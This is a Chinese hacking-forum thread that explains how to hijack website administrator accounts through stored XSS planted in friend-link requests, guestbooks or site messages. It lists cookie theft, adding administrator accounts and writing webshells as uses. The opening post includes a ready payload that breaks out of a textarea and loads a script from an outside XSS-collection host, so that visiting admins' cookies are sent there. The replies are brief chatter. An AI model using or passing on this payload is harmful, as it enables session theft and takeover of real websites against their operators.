查看: 17289|回复: 9

你这样做,何不如CSRF?

[复制链接]
发表于 2014-8-14 10:06:58 | 显示全部楼层 |阅读模式
原帖地址:http://www.ihonker.org/thread-3271-1-4.html

看了贴,我才知道这位仁兄可能不了解CSRF这么个好东西

从友情链接或者站内信以及留言反馈的地方,通过CSRF拿到后台或者拿到管理员账号密码早已不是新鲜事了。

我只是来提醒一下的


====================================================

比如:我们在友情链接申请的地方,放上一段JS,使得管理员点击(甚至都不用点击),鼠标移动上来

或者打开页面,就能触发xss

1.xss直接获取cookie

2.CSRF 发送cookie

3.CSRF 添加管理员

4.CSRF 生成一句话

5.CSRF 多了去了


例如直接拿cookie:

</textarea>'"><script src=http://x.xxoo.cc/8OTSbY?1407981679></script>

这是xss平台的代码,cookie值会发送到平台地址x.xxoo.cc对应的用户去。


乌云很多CSRF的组合拳应用,有个朋友出了一套组合拳

http://www.wooyun.org/bugs/wooyun-2014-071680



回复

使用道具 举报

发表于 2014-8-14 10:45:15 | 显示全部楼层
乌云 的那个洞目前还看不了
回复 支持 反对

使用道具 举报

发表于 2014-8-14 11:53:56 | 显示全部楼层
楼主的这个方法不错,可惜俺小白不会构造JS语句,这是蛋疼的地方啊
回复 支持 反对

使用道具 举报

发表于 2014-8-14 12:37:52 | 显示全部楼层
要利用CSRF,首先要存在CSRF

点评

当然,这也需要一定的条件。 条件不支持,这条路也行不通 话说论坛的表情能换点新鲜的吗? 总是这几个表情  详情 回复 发表于 2014-8-14 17:06
回复 支持 反对

使用道具 举报

发表于 2014-8-14 13:17:19 | 显示全部楼层
个人表示还不会csrf,求大牛指点
回复 支持 反对

使用道具 举报

 楼主| 发表于 2014-8-14 17:06:52 | 显示全部楼层
90_ 发表于 2014-8-14 12:37
要利用CSRF,首先要存在CSRF

当然,这也需要一定的条件。

条件不支持,这条路也行不通

话说论坛的表情能换点新鲜的吗?

总是这几个表情

回复 支持 反对

使用道具 举报

发表于 2014-8-15 15:45:54 | 显示全部楼层
学习一下,看帖就要回复,
回复 支持 反对

使用道具 举报

发表于 2014-8-17 21:34:49 | 显示全部楼层
楼主的这个方法不错,可惜俺小白不会构造JS语句,这是蛋疼的地方啊
回复 支持 反对

使用道具 举报

发表于 2014-8-18 01:26:25 | 显示全部楼层
XSS盲打
回复 支持 反对

使用道具 举报

发表于 2014-8-18 20:42:23 | 显示全部楼层
我是电脑小白,打酱油的,路过学习
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-10 12:22 , Processed in 0.029572 second(s), 14 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部